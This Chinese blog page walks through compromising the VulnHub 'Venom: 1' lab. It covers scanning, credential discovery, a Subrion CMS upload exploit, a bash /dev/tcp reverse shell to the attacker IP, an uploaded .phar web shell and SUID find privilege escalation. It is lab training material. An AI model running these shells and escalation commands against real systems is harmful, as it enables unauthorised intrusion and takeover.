当前位置: 首页 > backend >正文

Venom: 1靶场

Venom: 1

来自 <Venom: 1 ~ VulnHub>

 

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.182,靶场IP192.168.23.130

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.130

存在21,22,80,443,7070,8084端口开放着服务,访问之

 

4,匿名登录一下ftp服务

ftp anonymous@192.168.23.130

无权限,登录失败

 

5,再访问80端口开放的http服务

扫描存在的网站子目录

dirsearch -u http://192.168.23.130 -x 404,403

页面源代码存在一串MD5值,解密得到hostinger

再看看443端口开放的http服务

再次扫描存在的网站子目录

dirsearch -u http://192.168.23.130:443 -x 404,403

除了页面源代码以外依然什么都没有

 

6,接着信息收集,使用enum4linux进行扫描

enum4linux -a 192.168.23.130

得到用户名hostinger密码是hostinger,尝试登录ftp服务器

ftp hostinger@192.168.23.130

发现一个文件夹,里面存在一个文本文件

尝试解密base64字符串

echo WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0= | base64 -d | base64 -d | base64 -d

echo aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI= | base64 -d

得到原句:You need to follow the 'hostinger' on standard vigenere cipher also on Vigenère cipher: Encrypt and decrypt online - cryptii                                    

直接解码L7f9l8@J#p%Ue+Q1234

 

7,然后需要在hosts 文件中添加 venom.box,访问

echo "192.168.23.130 venom.box" >>/etc/hosts

http://venom.box/

尝试登录一下,账户密码:dora /E7r9t8@Q#h%Hy+M1234

登陆成功,扫描识别网站目录

whatweb -v http://venom.box/

搜索网站CMS

searchsploit  Subrion CMS 

选择文件上传利用

searchsploit -m 49876.py

8,尝试getshell

成功getshell,然后再尝试反弹shell

bash -i >& /dev/tcp/192.168.23.182/4444 0>&1

反弹shell失败,然后再尝试上传kali的自带的木马

访问这个网站触发反弹shell

http://venom.box/uploads/shell.phar

与此同时打开对4444端口的监听

成功getshell

 

9,然后使用python脚本启动一个可交互shell

python -c 'import pty;pty.spawn("/bin/bash")'

信息收集一下

cd /var/backup.bak

cat .backup.txt

user: hostinger

password: hostinger

 

10,继续信息收集

cd /var/www/html/subrion

ls -al

cat robots.txt

cat .gitignore

cat composer.json

cd /var/www/html/subrion/backup

ls -al

cat .htaccess

得到一个字符串FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a

 

11,查看存在哪些用户

 ls -al /home

上线hostinger,用户名就是密码。然后信息收集一下,可以查看执行过的系统命令

su hostinger

cat .bash_history

经常切换用户nathan,发现了查新suid程序的命令:

find / -perm -u=s -type f 2>/dev/null

 

12,切换至nathan用户试试,密码信息收集的时候就已经知道了

su nathan

FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a

成功得到了user.txt。

接下来看看提权方式,先看看sudo提权

sudo允许我们以root权限执行su命令,但是提权失败。

再看看suid提权方法

find / -perm -4000 -exec ls -al {} \; 2>/dev/null

find命令存在suid权限,属主是root用户,尝试提权

find . -exec /bin/bash -p \; -quit

最后成功得到flag

 

http://www.xdnf.cn/news/7912.html

相关文章:

  • 使用 Matter.js 创建封闭箱体与里面的小球
  • SOPHGO算能科技BM1688内存使用与编解码开发指南
  • 【Docker】Docker -p 将容器内部的端口映射到宿主机的端口
  • 5月24日全国青少年信息素养大赛——python编程挑战赛初赛就开赛了,你准备好没?
  • 计算机视觉与深度学习 | Python实现CEEMDAN-ABC-VMD-DBO-CNN-LSTM时间序列预测(完整源码和数据)
  • 第一章 Proteus中Arduino的可视化程序
  • Vue.js教学第九章:Vue动态与异步组件,高效开发全攻略
  • 什么是实时流数据?核心概念与应用场景解析
  • QRsim:一款快速验证控制算法和无缝迁移到实物平台的无人系统3D仿真平台
  • 虚拟机NAT模式获取不到ip
  • 全方位详解微服务架构中的Service Mesh(服务网格)
  • 深入浅出Java-Lambda表达式
  • 目标检测 LW-DETR(2024)详细解读
  • [Vue]路由基础使用和路径传参
  • 《C 语言字符串操作从入门到实战(上篇):字符分类、转换及strlen/strcpy等函数详解》
  • 智橙云PLM上线【企业知识库】,构建企业自己的研发创新知识库!!
  • 云DNS智能解析:实现多区域部署
  • 第五章 GPT模块配置
  • 深入浅出理解时间复杂度和空间复杂度
  • 【音频】如何解析mp3文件
  • 如何从 iPhone 获取照片:5 个有效解决方案
  • Wi-Fi(无线局域网技术)
  • C++类与对象(二):六个默认构造函数(二)
  • 心联网(社群经济)视角下开源AI智能名片、链动2+1模式与S2B2C商城小程序源码的协同创新研究
  • 第13天-用BeautifulSoup解析网页数据:以百度热搜可视化为例
  • leetcode2844. 生成特殊数字的最少操作-medium
  • C语言中的弱符号 __attribute__((weak)) 的使用方法
  • C语言---内存函数
  • Axure通过下拉框选项改变,控制字段显隐藏
  • Rust 学习笔记:关于泛型的练习题